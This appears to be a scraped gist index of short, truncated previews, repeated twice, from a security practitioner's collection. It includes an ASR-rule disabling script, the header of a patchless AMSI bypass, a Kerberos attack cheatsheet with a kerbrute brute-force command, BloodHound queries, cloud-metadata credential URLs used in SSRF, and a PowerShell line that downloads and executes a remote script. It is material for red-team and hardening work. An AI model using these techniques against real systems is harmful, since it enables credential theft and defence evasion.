Michael Ritter michiiii

## Configure-ASR.ps1
#Requires -RunAsAdministrator

<#
.SYNOPSIS
    Script used to manage state of Microsoft Defender's Attack Surface Redution rules.
    Configures all ASR rules into mode defined in -State parameter.

.PARAMETER State
    Tells how to configure all ASR rules available. Valid options:
      - Disable (Disable the ASR rule)

## patchless_amsi.h
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H

#include <windows.h>

static const int AMSI_RESULT_CLEAN = 0;

PVOID g_amsiScanBufferPtr = nullptr;

unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {

## Harden.ps1
# Enable Windows Firewall
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True

# SMB # require elevated privileges #
## Turn on SMB signing and encryption
Set-SmbServerConfiguration -RequireSecuritySignature $True -EnableSecuritySignature $True -EncryptData $True -Confirm:$false -Verbose

## Turn off the default workstations shares
Set-SmbServerConfiguration -AutoShareWorkstation $False -Confirm:$false -Verbose

## Jenkinsfile
@Library('ci-jenkins-common') _

// Jenkins build pipeline (declarative)

// Project:         Seatbelt
// URL:             https://github.com/GhostPack/Seatbelt
// Author:          @tifkin_/@harmj0y
// Pipeline Author: harmj0y

def gitURL = "https://github.com/GhostPack/Seatbelt"

## notes
AV Products or Companies:
 Avast
 BitDefender
 Carbon Black
 Check Point
 Cisco
 ClamAV
 CrowdStrike
 Cylance
 Elastic Endpoint Security

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              373 forks
            
          
              5 comments
            
          
              1084 stars
            
          
                TarlogicSecurity
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              May 14, 2019 13:33
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## gist:7b4a67bb7dd0cfbfbd83768f3aa6eb12
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
RETURN u.name

That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------

MATCH
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
WITH
U.name as n,

## cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

## Get-AzureADPSPermissions.ps1
# THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF
# FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT.

#Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication"  ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Applications"    ; ModuleVersion="2.15.0" }
#Requires -Modules @{ ModuleName="Microsoft.Graph.Users"           ; ModuleVersion="2.15.0" }

<#

## install-choco-script.bat
:: Download this and execute as admin

:: Install choco .exe and add choco to PATH
@powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))" && SET "PATH=%PATH%;%ALLUSERSPROFILE%\chocolatey\bin"

choco feature enable -n allowGlobalConfirmation

:: Just install node stuff manually.  Trust me.
:: choco install nodejs-lts --install-directory='C:\nodejs' -fy
:: npm install -g gulp cordova@6.5.0 ionic@2.2.3 bower
	#Requires -RunAsAdministrator

	<#
	.SYNOPSIS
	Script used to manage state of Microsoft Defender's Attack Surface Redution rules.
	Configures all ASR rules into mode defined in -State parameter.

	.PARAMETER State
	Tells how to configure all ASR rules available. Valid options:
	- Disable (Disable the ASR rule)
	#ifndef PATCHLESS_AMSI_H
	#define PATCHLESS_AMSI_H

	#include <windows.h>

	static const int AMSI_RESULT_CLEAN = 0;

	PVOID g_amsiScanBufferPtr = nullptr;

	unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
	# Enable Windows Firewall
	Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True

	# SMB # require elevated privileges #
	## Turn on SMB signing and encryption
	Set-SmbServerConfiguration -RequireSecuritySignature $True -EnableSecuritySignature $True -EncryptData $True -Confirm:$false -Verbose

	## Turn off the default workstations shares
	Set-SmbServerConfiguration -AutoShareWorkstation $False -Confirm:$false -Verbose
	@Library('ci-jenkins-common') _

	// Jenkins build pipeline (declarative)

	// Project: Seatbelt
	// URL: https://github.com/GhostPack/Seatbelt
	// Author: @tifkin_/@harmj0y
	// Pipeline Author: harmj0y

	def gitURL = "https://github.com/GhostPack/Seatbelt"
	AV Products or Companies:
	Avast
	BitDefender
	Carbon Black
	Check Point
	Cisco
	ClamAV
	CrowdStrike
	Cylance
	Elastic Endpoint Security
	MATCH (u:User)-[r:AdminTo\|MemberOf*1..]->(c:Computer
	RETURN u.name

	That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
	---------------

	MATCH
	(U:User)-[r:MemberOf\|:AdminTo*1..]->(C:Computer)
	WITH
	U.name as n,
	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
	# THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF
	# FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT.

	#Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" }
	#Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" }
	#Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" }
	#Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" }
	#Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" }

	<#
	:: Download this and execute as admin

	:: Install choco .exe and add choco to PATH
	@powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))" && SET "PATH=%PATH%;%ALLUSERSPROFILE%\chocolatey\bin"

	choco feature enable -n allowGlobalConfirmation

	:: Just install node stuff manually. Trust me.
	:: choco install nodejs-lts --install-directory='C:\nodejs' -fy
	:: npm install -g gulp cordova@6.5.0 ionic@2.2.3 bower